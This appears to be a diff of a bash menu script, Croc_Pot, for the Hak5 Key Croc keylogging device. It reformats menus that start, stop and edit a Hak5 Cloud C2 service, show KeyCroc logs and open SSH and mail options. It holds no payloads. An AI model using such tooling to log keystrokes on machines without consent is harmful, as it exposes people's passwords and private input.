1 HAK5 C2 SETUP ; echo -ne " ${clear}\n" -MenuColor 2 START HAK5 C2 ; echo -ne " ${clear}\n" -MenuColor 3 RELOAD HAK5 C2 ; echo -ne " ${clear}\n" -MenuColor 4 RESTART HAK5 C2 ; echo -ne " ${clear}\n" -MenuColor 5 STOP HAK5 C2 ; echo -ne " ${clear}\n" -MenuColor 6 REMOVE HAK5 C2 ; echo -ne " ${clear}\n" -MenuColor 7 EDIT HAK5 C2 ; echo -ne " ${clear}\n" -MenuColor 8 QUICK START C2 ; echo -ne " ${clear}\n" -MenuColor 9 SAVE C2 SETUP IP ; echo -ne " ${clear}\n" -MenuColor 10 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle HAK5 CLOUD C2 MENU ; MenuColor 20 1 HAK5 C2 SETUP ; MenuColor 20 2 START HAK5 C2 ; MenuColor 20 3 RELOAD HAK5 C2 ; MenuColor 20 4 RESTART HAK5 C2 ; MenuColor 20 5 STOP HAK5 C2 +MenuColor 20 6 REMOVE HAK5 C2 ; MenuColor 20 7 EDIT HAK5 C2 ; MenuColor 20 8 QUICK START C2 ; MenuColor 20 9 SAVE C2 SETUP IP ; MenuColor 19 10 RETURN TO MAIN MENU ; MenuEnd 23 case $m_a in - 1) cloud_setup ; hak_cloud ;; - 2) start_web ; hak_cloud ;; - 3) reload_cloud ; hak_cloud ;; - 4) systemctl restart hak5.service ; start_web ; hak_cloud ;; - 
5) systemctl stop hak5.service ; hak_cloud ;; - 6) remove_cloud ; hak_cloud ;; - 7) nano /etc/systemd/system/hak5.service ; hak_cloud ;; - 8) quick_cloud ; hak_cloud ;; - 9) save_ip ; hak_cloud ;; - 10) main_menu ;; - [bB]) main_menu ;; - 0) exit 0 ;; - *) invalid_entry ; hak_cloud ;; + 1) cloud_setup ; hak_cloud ;; 2) cloud_web ; hak_cloud ;; 3) reload_cloud ; hak_cloud ;; 4) systemctl restart hak5.service ; cloud_web ; hak_cloud ;; 5) systemctl stop hak5.service ; hak_cloud ;; + 6) remove_cloud ; hak_cloud ;; 7) nano /etc/systemd/system/hak5.service ; hak_cloud ;; 8) quick_cloud ; hak_cloud ;; 9) save_ip ; hak_cloud ;; 10) main_menu ;; [bB]) main_menu ;; 0) exit 0 ;; *) invalid_entry ; hak_cloud ;; esac } ## #----Croc_Pot Main Menu ## function main_menu() { - LED B clear - croc_title -MenuTitle CROC POT MAIN MENU -MenuColor 1 CROC MAIL ; echo -ne " ${blue} ${array[4]} ${clear} \n" -MenuColor 2 CROC POT PLUS ; echo -ne " ${red} ${array[5]} ${clear} \n" -MenuColor 3 KEYCROC STATUS ; echo -ne "${green} ${array[6]} ${clear} \n" -MenuColor 4 KEYCROC LOGS ; echo -ne " ${white} ${array[7]} ${clear} \n" -MenuColor 5 KEYCROC EDIT ; echo -ne " ${yellow} ${array[8]} ${clear} \n" -MenuColor 6 SSH MENU ; echo -ne " ${blue} ${array[9]} ${clear} \n" -MenuColor 7 RECOVERY MENU ; echo -ne " ${green} ${array[10]} ${clear} \n" -MenuColor 8 HAK5 CLOUD C2 ; echo -ne " ${white} ${array[11]} ${clear} \n" -MenuEnd +croc_title ; MenuTitle CROC POT MAIN MENU ; MenuColor 16 1 CROC MAIL | tr -d '\n' ; echo -ne "${blue}${array[4]} ${clear}\n" ; MenuColor 16 2 CROC POT PLUS | tr -d '\n' ; echo -ne "${red}${array[5]} ${clear}\n" +MenuColor 16 3 KEYCROC STATUS | tr -d '\n' ; echo -ne "${green}${array[6]} ${clear}\n" ; MenuColor 16 4 KEYCROC LOGS | tr -d '\n' ; echo -ne "${white}${array[7]} ${clear}\n" ; MenuColor 16 5 KEYCROC EDIT | tr -d '\n' ; echo -ne "${yellow}${array[8]} ${clear}\n" +MenuColor 16 6 SSH MENU | tr -d '\n' ; echo -ne "${cyan}${array[9]} ${clear}\n" ; MenuColor 16 7 RECOVERY 
MENU | tr -d '\n' ; echo -ne "${pink}${array[10]} ${clear}\n" ; MenuColor 16 8 HAK5 CLOUD C2 | tr -d '\n' ; echo -ne "${white}${array[11]} ${clear}\n" ; MenuEnd 20 case $m_a in - 1) croc_mail ;; - 2) croc_pot_plus ;; - 3) croc_status ;; - 4) croc_logs_mean ;; - 5) croc_edit_menu ;; - 6) ssh_menu ;; - 7) croc_recovery ;; - 8) hak_cloud ;; - 0) exit 0 ;; - *) invalid_entry ; main_menu ;; + 1) croc_mail ;; 2) croc_pot_plus ;; 3) croc_status ;; 4) croc_logs_mean ;; 5) croc_edit_menu ;; 6) ssh_menu ;; 7) croc_recovery ;; 8) hak_cloud ;; 0) exit 0 ;; *) invalid_entry ; main_menu ;; esac } main_menu